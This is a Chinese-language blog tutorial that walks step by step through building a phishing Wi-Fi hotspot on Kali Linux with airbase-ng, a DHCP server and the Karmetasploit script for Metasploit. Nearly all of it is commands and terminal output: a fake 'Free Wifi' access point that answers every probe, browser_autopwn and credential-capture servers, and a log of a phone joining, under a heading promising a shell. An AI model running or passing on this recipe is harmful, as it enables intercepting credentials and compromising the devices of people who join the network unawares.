使用kali搭建钓鱼WIFI——KARMA

文章目录前言0x01.安装DHCP服务器0x02.更改配置文件0x03.下载KARMA源文件0x04.设置网卡为监听模式0x05.创建假冒WIFI0x06.打开at0接口并运行DHCP服务0x07.加载KARMA源文件0x08.获取shell总结前言本文详细的介绍了使用kali搭建钓鱼wifi的过程，依赖Karmetasploit无线攻击套件测试环境描述ip主机kali2020192.168.1.

我重来不说话

5737人浏览 · 2021-06-23 22:02:49

我重来不说话 · 2021-06-23 22:02:49 发布

文章目录

前言
0x01.安装DHCP服务器
0x02.更改配置文件
0x03.下载KARMA源文件
0x04.设置网卡为监听模式
0x05.创建假冒WIFI
0x06.打开at0接口并运行DHCP服务
0x07.加载KARMA源文件
0x08.获取shell
总结

前言

本文详细的介绍了使用kali搭建钓鱼wifi的过程，依赖Karmetasploit无线攻击套件

测试环境	描述	ip
主机	kali2020	192.168.1.113
无线网卡	D-link 802.11 n wlan

0x01.安装DHCP服务器

apt-get install isc-dhcp-server

安装成功后，创建一个自定义配置

0x02.更改配置文件

当前目录为 /root/桌面

option domain-name-servers 10.0.0.1;
default-lease-time 60;
max-lease-time 72;
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0{
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}

紧接着将自定义配置替换原先的配置（别忘了备份初始配置）

cp /etc/dhcp/dhcpd.conf /etc/dhcp/dhcpd.conf.back  #备份
mv dhcod.conf /etc/dhcp/dhcpd.conf  #替换

0x03.下载KARMA源文件

wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

0x04.设置网卡为监听模式

iwconfig  #查看网卡
airmon-ng start wlan0  #设置为监听模式

0x05.创建假冒WIFI

-P 响应所有的探测
-c 30 每30发信号
-e 使用free wifi作为essid
-v 以调试模式运行

airbase-ng -P -C 30 -e "Free Wifi" -v wlan0mon

部分过程

┌──(root💀kali)-[/etc/dhcp]
└─# airmon-ng start wlan0                                                                                                                          1 ⨯

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    536 NetworkManager
    772 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           rt2800usb       D-Link Corp. DWA-140 RangeBooster N Adapter(rev.B3) [Ralink RT5372]
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

                                                                                                                                                       
┌──(root💀kali)-[/etc/dhcp]
└─# airbase-ng -P -C 30 -e "Free Wifi" -v wlan0mon
21:47:31  Created tap interface at0
21:47:31  Trying to set MTU on at0 to 1500
21:47:31  Trying to set MTU on wlan0mon to 1800
21:47:31  Access Point with BSSID E8:CC:18:C2:33:B4 started.
21:47:31  Got broadcast probe request from 70:66:55:B2:BD:83
21:47:31  Got broadcast probe request from 70:66:55:B2:BD:83
21:47:31  Got broadcast probe request from DA:A1:19:94:66:75
21:47:31  Got directed probe request from DA:A1:19:94:66:75 - "wwwwww"

0x06.打开at0接口并运行DHCP服务

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
接口at0打开并且使用10.0.0.1为ip

touch /var/lib/dhcp/dhcpd.leases
建立dhcp服务器租约文件

dhcpd -cf /etc/dhcp/dhcpd.conf at0
dhcp服务器在at0接口运行

ps aux |grep dhcpd
查看dhcp是否运行

tail -f /var/log/messages
追踪日志：查看ip地址分发时间

部分过程

┌──(root💀kali)-[~]
└─# ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
                                                                                                                                                       
┌──(root💀kali)-[~]
└─# touch /var/lib/dhcp/dhcpd.leases
                                                                                                                                                       
┌──(root💀kali)-[~]
└─# dhcpd -cf /etc/dhcp/dhcpd.conf at0
Internet Systems Consortium DHCP Server 4.4.1
Copyright 2004-2018 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/
Config file: /etc/dhcp/dhcpd.conf
Database file: /var/lib/dhcp/dhcpd.leases
PID file: /var/run/dhcpd.pid
Wrote 1 leases to leases file.
Listening on LPF/at0/e8:cc:18:c2:33:b4/10.0.0.0/24
Sending on   LPF/at0/e8:cc:18:c2:33:b4/10.0.0.0/24
Sending on   Socket/fallback/fallback-net
                                                                                                                                                       
┌──(root💀kali)-[~]
└─# tail -f /var/log/messages       
Jun 23 21:47:31 kali kernel: [ 1524.862886] tun: Universal TUN/TAP device driver, 1.6
Jun 23 21:47:53 kali dhcpd[1427]: Internet Systems Consortium DHCP Server 4.4.1
Jun 23 21:47:53 kali dhcpd[1427]: Copyright 2004-2018 Internet Systems Consortium.
Jun 23 21:47:53 kali dhcpd[1427]: All rights reserved.
Jun 23 21:47:53 kali dhcpd[1427]: For info, please visit https://www.isc.org/software/dhcp/
Jun 23 21:47:53 kali dhcpd[1427]: Wrote 1 leases to leases file.
Jun 23 21:47:53 kali dhcpd[1427]: Listening on LPF/at0/e8:cc:18:c2:33:b4/10.0.0.0/24
Jun 23 21:47:53 kali dhcpd[1427]: Sending on   LPF/at0/e8:cc:18:c2:33:b4/10.0.0.0/24
Jun 23 21:47:53 kali dhcpd[1427]: Sending on   Socket/fallback/fallback-net
Jun 23 21:47:53 kali dhcpd[1427]: Server starting service.

0x07.加载KARMA源文件

启动metasploit

msfconsole
resource karma.rc_.txt

部分过程

msf6 > resource karma.rc_.txt
[*] Processing /root/桌面/karma.rc_.txt for ERB directives.
resource (/root/桌面/karma.rc_.txt)> db_connect postgres:toor@127.0.0.1/msfbook
[-] Failed to connect to the Postgres data service: could not connect to server: Connection refused
        Is the server running on host "127.0.0.1" and accepting
        TCP/IP connections on port 5432?

resource (/root/桌面/karma.rc_.txt)> use auxiliary/server/browser_autopwn
resource (/root/桌面/karma.rc_.txt)> setg AUTOPWN_HOST 10.0.0.1
AUTOPWN_HOST => 10.0.0.1
resource (/root/桌面/karma.rc_.txt)> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource (/root/桌面/karma.rc_.txt)> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource (/root/桌面/karma.rc_.txt)> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource (/root/桌面/karma.rc_.txt)> set LPORT 45000
LPORT => 45000
resource (/root/桌面/karma.rc_.txt)> set SRVPORT 55550
SRVPORT => 55550
resource (/root/桌面/karma.rc_.txt)> set URIPATH /ads
URIPATH => /ads
resource (/root/桌面/karma.rc_.txt)> run
[*] Auxiliary module running as background job 0.
resource (/root/桌面/karma.rc_.txt)> use auxiliary/server/capture/pop3
resource (/root/桌面/karma.rc_.txt)> set SRVPORT 110

[*] Setup
SRVPORT => 110
resource (/root/桌面/karma.rc_.txt)> set SSL false
...

resource (/root/桌面/karma.rc_.txt)> run
[*] Auxiliary module running as background job 13.

[*] Server started.

0x08.获取shell

当这些准备工作做好后，打开设备wifi就可以看到我们搭建的钓鱼wifi

查看刚才的跟踪日志窗口可以看到连接主机的ip地址和分配的地址

Jun 23 21:52:39 kali dhcpd[1427]: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPACK on 10.0.0.101 to 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPACK on 10.0.0.101 to 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPACK on 10.0.0.101 to 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPACK on 10.0.0.101 to 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPREQUEST for 10.0.0.101 (10.0.0.1) from 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0
Jun 23 21:52:39 kali dhcpd[1427]: DHCPACK on 10.0.0.101 to 18:f0:e4:da:21:c7 (MiNote3-liulengtihei) via at0